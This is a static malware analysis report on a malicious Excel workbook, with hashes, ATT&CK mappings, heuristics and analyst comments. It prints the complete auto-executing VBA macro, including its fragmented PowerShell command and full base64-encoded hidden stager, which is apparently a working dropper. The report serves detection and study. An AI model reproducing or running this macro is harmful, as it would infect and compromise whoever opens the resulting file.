Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 bcfd44785a2ce617…

MALICIOUS

Office (OOXML)

21.8 KB Created: 2021-06-11 12:59:20 UTC Authoring application: Microsoft Excel 14.0300 First seen: 2021-07-07
MD5: 55a84c152d137ba40f8b79095a24871a SHA-1: a8c51a39bf2f458eec6fda1ea5f506446ef2e350 SHA-256: bcfd44785a2ce617a3cef809da911eeeb65d2a1d059761b48dd2f1bd6d201b09
170 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File T1140 Deobfuscate/Decode Files or Information T1027 Obfuscated Files or Information

The Workbook_Open macro (ThisWorkbook module) builds a PowerShell command line from short concatenated string fragments — so the literal "powershell.exe" never appears in the source — and launches it with CreateObject("WScript.Shell").Run; there is no Shell() call in the extracted source. The command is `powershell.exe -nop -w hidden -e <base64>`. Decoding the UTF-16LE payload after -e shows a loader that selects a 32-bit PowerShell host (`%windir%\syswow64\WindowsPowerShell\v1.0\powershell.exe` when `[IntPtr]::Size` is not 4), then starts it hidden through System.Diagnostics.ProcessStartInfo with `-nop -w hidden -c` and a script block that gunzips and executes an embedded base64 blob (the `H4sI…` run inside the fragments). That inner gzip-compressed stage is not decoded in this report, so the "download and execute a second-stage payload" behaviour is inferred from the loader layout (typical of Metasploit/Cobalt Strike PowerShell stagers), not observed. The fragment construction plus double encoding (base64 of UTF-16LE, then base64+gzip inside) is why plain string signatures — ClamAV here — do not fire on the VBA source. The sheet modules are named 工作表1–3, the default sheet names of a Chinese-locale Excel, which may be useful for attribution.

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        CreateObject("WScript.Shell").Run Str
    End Sub
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        CreateObject("WScript.Shell").Run Str
    End Sub
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Workbook_Open()
    Dim Str As String
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 9239 bytes
SHA-256: a541f9afe2cfd52e3b75612847266b4be4cd712432f7c3264c230c034d3401b6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 54 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Analyst note: auto-executes when the workbook is opened with macros enabled.
' This is the only code in the VBA project — Module1 and the three sheet
' modules (工作表1–3) contain attribute headers only.
Private Sub Workbook_Open()
Dim Str As String
    ' The command line is assembled from 2–8 character fragments so that the
    ' string "powershell.exe" never appears contiguously in the source.
    ' Assembled text:  powershell.exe -nop -w hidden -e <base64>
    Str = "po"
    Str = Str + "wer"
    Str = Str + "she"
    Str = Str + "ll."
    Str = Str + "exe -n"
    Str = Str + "op -w hi"
    Str = Str + "dde"
    Str = Str + "n -"
    ' Everything after "-e " is base64 of a UTF-16LE PowerShell script. Decoded
    ' (line breaks added for readability) it reads:
    '   if([IntPtr]::Size -eq 4){$b='powershell.exe'}
    '   else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};
    '   $s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;
    '   $s.Arguments='-nop -w hidden -c &([scriptblock]::create((New-Object
    '       System.IO.StreamReader(New-Object System.IO.Compression.GzipStream(
    '       (New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(
    '       ''H4sI...gAA''))),[System.IO.Compression.CompressionMode]::Decompress
    '       ))).ReadToEnd()))';
    '   $s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;
    '   $s.WindowStyle='Hidden';$s.CreateNoWindow=$true;
    '   $p=[System.Diagnostics.Process]::Start($s);
    ' So: pick the 32-bit PowerShell host when running in a 64-bit process,
    ' then spawn a second, hidden PowerShell whose script block is a
    ' gzip-compressed, base64-encoded blob (the H4sI... run in the fragments
    ' below). That inner blob is NOT decoded here; the 32-bit pivot plus
    ' gzip'd scriptblock layout is typical of Metasploit/Cobalt Strike
    ' PowerShell stagers, so any download/second-stage behaviour is inferred,
    ' not observed, until the blob is inflated.
    Str = Str + "e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGU"
    Str = Str + "AcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGk"
    Str = Str + "AbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0"
    Str = Str + "ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHM"
    Str = Str + "ALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACA"
    Str = Str + "AJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8"
    Str = Str + "ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8"
    Str = Str + "AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGU"
    Str = Str + "AYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEk"
    Str = Str + "AQQBBADEAZAB3ADIAQQBDAEEANwBWAFcAKwAyAC8AYQBTAEIARAArAE8AWgBIADYAUAAxAGcAVgBrAG0AMQBCAEEAUABOAEkAbQBrAGkAVgB6AGoAYQBZAFY"
    Str = Str + "AMwBpAGEAVgAwAHIAUgBhAGIARQBYAGUAMgBIAHQAaABmAFgAYQA0AFAAVAA2AHYAOQA4AGEAYwBKAHEAcQBhAGQAVwBlAGQAQgBZAFMANgA5ADIAWgAyAFo"
    Str = Str + "AbAB2AHYAcABuAHgATwB2AFEAdABoAG8AZwB2AE8ASABaAEQAKwBQAEwAdQArAG0AbwBBAEsAUABBAEUASwBZAE8AdABuAEoAQQBoAEwAZABTAFIAcgA2ADc"
    Str = Str + "ANABkAHUAWgBvAGoAYQBFAHIAZgBCAFMAawBoAGIAcgBiADEAWQBnAEgAawBMADkAOABlAE4AQgBEAFMAcQBIAFAAegB1AC8ANQBCAG0AUgBxAEUARQBCAHY"
    Str = Str + "AaABSAEUATQBKAEYAbgA0AFIANQBpADUAawBNAEsAYgAvAG0AbwBEAEwAUwBaADgARQBUAEoALwA1AHgAdQBZAHIAQQBDACsAaQBNAFUANgBzAEYAdwBvADM"
    Str = Str + "ASwBpACsAbgBaAHcAOQBFAGcAcwBrAHoAdQBUAE4ASABVAFoATQBFAGoAOQAvAEYAdQBYAEYAagBiAEwATQAxAC8AYwBoAHcASQBFAGsAbQBuAEgAQQBvAEo"
    Str = Str + "AZQAzAE0AUgBaAGwANABhAHUAYwBYAEQAaQBPAGQAMQBBAFMAdQA4AGkAaQBKAEMAQgByAGwAcAA4AGgAdgAxAHoASwBUAC8AdwBBAHIARwBHAFAAVwA0AHQ"
    Str = Str + "AZwBGAHoASwBYADIASQBFAG8AOAB6AEQANABqADAASQBXAFUAbAA4ADQAQgA1AFIAWQBPAEoAOQBMAEkAbAA4AE8ASwBMAEYAVQAyADYAWQB3AEMATQBTAGM"
    Str = Str + "AcwBFAGgAcwBMADUAYgBMAHYANgBUAEYANQBlAEoAUgA2AEQAUABrAHcAWAB6AEwAWgA1AEMAUwBuAFEAbABwAGgAQwB3AFkANQBKAHYAQQB0AHoARQBjAHc"
    Str = Str + "AZgBXAFMAYQA1AG0ATQBJAHQAOQBaAHkAagBJAFgAaQA4AGcAVwBTAGgAawAvAHgARABnAG4ALwBJAGsAWgBxAFEAYwBQAEsAVwB5AC8AcQB5AFMAOQBWAHU"
    Str = Str + "ASgBTAEEAMABiAGwASABNAC8AawBXADQARgAyAGkAUgAxAGkAZQBGAFkAVgAzAC8AQwBVAHAAMQAvAG0AVAAwAG8AQgBEAHQAMwBYAGQAOQBmAHYAcgB0AGM"
    Str = Str + "AcABXADQATAB2AHkATQBKAFgAVgA0AHYAVABHAG4ATABmAHAAQQBFAEoAMABFAG4AcQBvADEARABNAEMAVgAxACsAQwBXAEMARQB4AHYAdwAxAE0ANgBZAGg"
    Str = Str + "AbABKAGMAdgB5AEEAbwBaAFAARABDAE8AUgB1ADcAbgBCAHAAUgBVAG0AcwB2AFMAZABiAGYAVwA0AEgAdQBMAEsAVQBIADIAawB1AHQAYwBNAHAAbwBKAEg"
    Str = Str + "AVwBKAFcAawA0AE8AZgBVADcATQBHADEAOABpAEgAdABkAGcASABIAHIASgBTADkAawBsAHYAdwBRAHoAWABHAEoANgBDAHoASwBkAGkAUABlADYAVwBKAEY"
    Str = Str + "ANABPAG8ARgAyAEQARwBEAHEAQQBKAGIAZwBsADIAZgA1AEIAcgBlADQAaAA5AHEASwByAGgAUQBqAGIAawBLAG8AVwBUADEAWABBAHYAZQBKAFoAbABMADk"
    Str = Str + "AMwA1AHAAdwBLAFMAVwB6ADUAWABlAGgAeABtAE0ANwB2AG4ASAA2AFoATgBlAGMAOABUAEsAVQB2AFAASQAvAFQAMgA1AE4AMwBMAGkAVABxAEcAQQBSAEI"
    Str = Str + "AVABoAGkARQB2AE8AaAA0AHkAWgBvAFEAWQBHAGoAbgBCAE4AVQBQADAATwBWAEkARABSAGsANQBMAGMAVgB2ADcAbgBaAEQAegBKAEEARgBBAHAAYQBhAFc"
    Str = Str + "AOABvAHYAUQBGADQAdQAxAEkAawBmAE0AQgBwAGEAUABIAFUAOAArAEwARwA1AGcAeABZAEMATwBNAEUAaQBKAHoAUwBSAEQAYgBYAFkAUgBFADUANgBzAGY"
    Str = Str + "AZwBtAEUAagByAEEAbQBKAGMAQwB0AHgAVAB4AFQAUABDAGQAQgBBAEcAVABKAFkAUwBnADMATQBkAHoAOAB1AFcAOABDAFYAbgBMADIAMgBIAG8AYwBhAEY"
    Str = Str + "AVAAvAFIAcwBZAE8ATAB6AGEATAA0AHcALwBVAFEAZwA0ADAAQgBaAC8AOABEAEYAbAA5AEoAbQArAEMAUgB3AHAARABxADgAOAA1AEQAawAyAE0AVwBFADU"
    Str = Str + "AWQBZAG8AbwA0ADMAMABrAGcAZgBaAEUAcABmAC8AbwB3AGEAcwBlAGMAdgBaAEYAcAAvAEMAUwBFAEMAawB0AGwASQBVAFcAcwA0AFQAZwBHAGQAeQB5ADk"
    Str = Str + "ASQBTAFoARgAzAEIATwBVAEYARABHAFkAVABBAG8AOABUAFEAUQB3AE4AdgBLAHUAVgA5AEkANwAwAFAALwAwADgARABTADUAcQBCAG8ANAAyAEoANwBNAEY"
    Str = Str + "AcAAzAEwAZQA4ADQAZgB6AGIAbQBSAG0AdgBRADEATgBUAGUAdgBOADQAMgBiADIATgBVAG4AcABIAE4AYgBOAHkASwBKAHQAbQBhAFUAbgAzAEMAcgBhAGQ"
    Str = Str + "AbwBZAEwAUAArAGIARgBOAFcAdABpAFYAcgAzAHEAagBjADcAZwAvAHgAbgBIAGEAbQBoACsAeQB4AE4AOQB0AHYAUgB1AEIAdQBXAG4AZgAzAGYAawBXAEQ"
    Str = Str + "AdABmAG4AegBQAGkANgBGADcAZQBhAEEAYgByAHYAMAB1AFQAQwBLADEAaABvAEcAdgBCADkAMwBuAGoAdQByAHIASwBvAGcAcQA3AEIAVAAyAHEAdABqAHY"
    Str = Str + "AVgBMAHIANwBPAGgAVwBhADYAeAA2AGoAYgBMAHEAagBkAHQAQgBPAFYANABGAG8ARQA0AGMAbABzADEAcQBkADEAbQBqAFAAeAA3AGkAdwBtAFAAUABQAGM"
    Str = Str + "AeQBCAEEAZgBRADEAbgBhADMAMgA3AGYANQB1AFgAZQB4AFAAbwA3AGIAdQBxAE0AagBTAEkAQQBwADYAUwB0AFEAdQBPAEwANAB6AEcAbQBaAEQASAB3ADM"
    Str = Str + "AMgBRADYAOQA1ADcAOAAvAFUAcgBXAEwARgBvADAANQBqAGMAMQArADEAaABsADMAZwB1AHQARQBSAGwAWABhADIAeQBpAHoANAAyAEsAUwBWAE8AbABhAE8"
    Str = Str + "AbwB6AEcAOABjADUAcwBoAGQAZQBMAEoAawBVAFIAWgBqADQAMAA2ADkAOQBVAFAAOQBRAFAAVwBxAG0AYQAvADAAaABrADkAdQAzAHIANQByAG0ANQA4ADg"
    Str = Str + "AdgBxADAAMQArADYAdgBCAHIAVgBEAEoAVgB2AFUAZQB1AGEAcQAzAGMAZgA2ADAAMwB6AHkAUgBQAFgAKwB5AEoAaQBBAHUAZQBhAHIAbwArAHIAKwBzAE8"
    Str = Str + "AdABVAEYAUQBWAEYAQQBaAGwAbQBSADQAVgB1AGQAbABJAFoAbABrAHYAYQBwAGwANAB2AFAARwA2AFAAcgBCAGoAcwBzAGkANwBiAEcAdAA2AEsARwBmAGU"
    Str = Str + "AMQBMAEgASwA2ADMAaQBZAEMAUQB4AFEAaQA0ADQAaQBKAEUANAAwAFAAVAB2AFgAVwBYAHoAWABNACsANgBjAEEAOQBMAFcATgBOAG0AMwBnAGIATwAxAEQ"
    Str = Str + "ATwBRAHIAMQBlAGgAcwBwAE0AOQBnAG0AYQBGAHYAdwBQADkAUgAwAHUAdwBIADIAUwBxAEYAMwBWAEIALwByAGgAagBJAHAAKwA2AHYAWgBxAE4AdQBDAG0"
    Str = Str + "AMABPAGgAZQByAEEANQBLAFIAVQB5AG4ASgBhAGUAYgBqAHQAbQBtAFQAcAAxAGQAbgBnADYAegBwAFcAagBIAHMANABQAGQAMwBkAFQAVwBuAEcAbgBwAFg"
    Str = Str + "ANABWAGwATgBSAHkAVgBBAHUAbgBsAFoAYgBlAGEATgBvADkARgBoAHkAcwBqAGEAcwAxAGgAMwBEAGEAMgBKAFQAZQBKADgAVABqAHoATQB2AFkAQQA3AC8"
    Str = Str + "AVQBlAEUAVwBvAG4AMAAyAEYATABxAEMAQgBDAHoAQQBuAEcAdQAvADIAYQBaAEUAYgBoAEIAcQBYAEQAagA0AGcASwBOAEcAUQBwAEcAVAB1AGIAeQBIADE"
    Str = Str + "ASQBlAFoAagBrAHcALwBXAHQARQBwAFUAagBJAG0AVgB6AEEALwBlADYAdgBuAGsATwBzACsAVABaAEwAeABOACsATABKAGMAZQBuAE0AbABDAHkAKwBDADg"
    Str = Str + "AcgBlAGgAawBtADQAOQBQAEgAegBpAEwAaQBaAEYAeAAyAHMAaQAvAHcAaAA5AGgANwBtADUANAByAEYAYwBMAFAASQBwAFUAVAB4AFcAaQBqAHoARwAzAHc"
    Str = Str + "AOQBMAEoANwB0AFkATwBwAG4ASwBKAFYAUABtAEQARQB4AHEASABKACsATQB5ADAAawBsAFoAbABpAHcAdQBUAFgALwBWADgAUQB1ADkAZQAvAHkAUAAvAHY"
    Str = Str + "AWABpAEgAMwBiACsAOABYAHAAYgA2AEYAWQB6AEYAMABpAC8AbQBIAC8AKwA0ADAALwB3AHYAUgBQAEEANQA4AEIAeABMAGkAZwB5AGQAcwBYAGgAdQBjAHg"
    Str = Str + "AKwBsAGIAOABGADMASwA4ACsAcwB3ADQANQBZAFQAbgBmAG4AMQA1AGsAawAvAEYAZgBzAGgAdQBlAHYAegB6ADQAOQAzADEAdgA0ADgAZQBuAEQASwBVAEM"
    Str = Str + "AZwBBAEEAJwAnACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8"
    Str = Str + "AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGw"
    Str = Str + "ARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHU"
    Str = Str + "AZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQ"
    Str = Str + "AdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQ"
    Str = Str + "AcwApADsA"
    
    ' Execution: WScript.Shell.Run with the assembled command line only — no
    ' window-style or wait arguments are passed; hiding is left to the
    ' "-w hidden" switch inside the command. Expected process chain:
    ' EXCEL.EXE -> powershell.exe (-e) -> powershell.exe (-c, 32-bit host on
    ' x64), which is the detection opportunity for EDR/Sysmon process-creation
    ' telemetry.
    CreateObject("WScript.Shell").Run Str
End Sub

Attribute VB_Name = "工作表1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "工作表2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "工作表3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 28672 bytes
SHA-256: 2010ba2b9f61d4f54e0a638176160c1d25a39d92418b521ce4154d5aaaedcb3c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 54 long base64-like blob(s).